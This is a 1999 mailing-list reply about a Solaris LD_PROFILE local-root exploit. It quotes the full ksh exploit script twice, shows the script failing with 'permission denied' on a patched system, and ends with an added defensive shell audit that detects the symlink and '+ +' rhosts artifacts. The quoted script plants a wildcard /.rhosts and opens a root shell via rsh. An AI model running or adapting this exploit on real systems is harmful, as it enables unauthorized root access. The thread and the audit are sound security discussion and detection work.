On Wed, 22 Sep 1999, Steve Mynott wrote:
> works on solaris 2.6 sparc anyway...
>
> #! /bin/ksh
> # LD_PROFILE local root exploit for solaris
> # [EMAIL PROTECTED] 19990922
> umask 000
> ln -s /.rhosts /var/tmp/ps.profile
> export LD_PROFILE=/usr/bin/ps
> /usr/bin/ps
> echo + + > /.rhosts
> rsh -l root localhost csh -i

Not on my system:

[brock@agfa brock]$ uname -a
SunOS agfa 5.6 Generic_105181-16 sun4m sparc SUNW,SPARCstation-20
[brock@agfa brock]$ cat r00t.sh
#! /bin/ksh
# LD_PROFILE local root exploit for solaris
# [EMAIL PROTECTED] 19990922
umask 000
ln -s /.rhosts /var/tmp/ps.profile
export LD_PROFILE=/usr/bin/ps
/usr/bin/ps
echo + + > /.rhosts
rsh -l root localhost csh -i
[brock@agfa brock]$ ./r00t.sh
PID TTY TIME CMD
22565 pts/5 0:00 r00t.sh
22484 pts/5 0:01 bash
./r00t.sh[8]: /.rhosts: cannot create
permission denied
[brock@agfa brock]$
--
Brock Sides
Unix Systems Administration
Towery Publishing
[EMAIL PROTECTED]
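
An audit sketch for the two artifacts the quoted script relies on: a symlink named `*.profile` in the profile output directory, and an rhosts file that contains `+ +` or is writable by group or other. This is an added example, not part of the original thread. The function names and the temporary fixture are constructed for illustration; on a real host the arguments would be the `/var/tmp` and `/.rhosts` paths named in the thread.

```shell
#!/bin/sh
# Added audit sketch, not from the thread. Paths are arguments so the checks
# run against a constructed fixture here, or against /var/tmp and /.rhosts.

# List symlinks named *.profile in the given directory with their targets.
# A regular *.profile file is ordinary profiler output; a symlink is the anomaly.
find_profile_symlinks() {
    for f in "$1"/*.profile; do
        [ -L "$f" ] || continue
        printf 'SYMLINK %s -> %s\n' "$f" "$(ls -l "$f" | sed 's/.* -> //')"
    done
}

# Flag an rhosts file that holds a "+ +" line (any host, any user) or that
# is writable by group or other.
check_rhosts() {
    file=$1
    [ -f "$file" ] || return 0
    if grep -Eq '^[[:space:]]*\+[[:space:]]+\+[[:space:]]*$' "$file"; then
        printf 'WILDCARD %s\n' "$file"
    fi
    perms=$(ls -l "$file" | cut -c1-10)
    case $perms in
        ?????w????|????????w?) printf 'WRITABLE %s %s\n' "$file" "$perms" ;;
    esac
}

# Constructed fixture: the end state the quoted script tries to reach, plus
# one harmless regular profile file that must not be reported.
demo() {
    t=$(mktemp -d) || return 1
    mkdir "$t/tmp"
    printf '+ +\n' > "$t/rhosts"
    chmod 666 "$t/rhosts"
    ln -s "$t/rhosts" "$t/tmp/ps.profile"
    : > "$t/tmp/ls.profile"
    find_profile_symlinks "$t/tmp"
    check_rhosts "$t/rhosts"
    rm -rf "$t"
}

demo
```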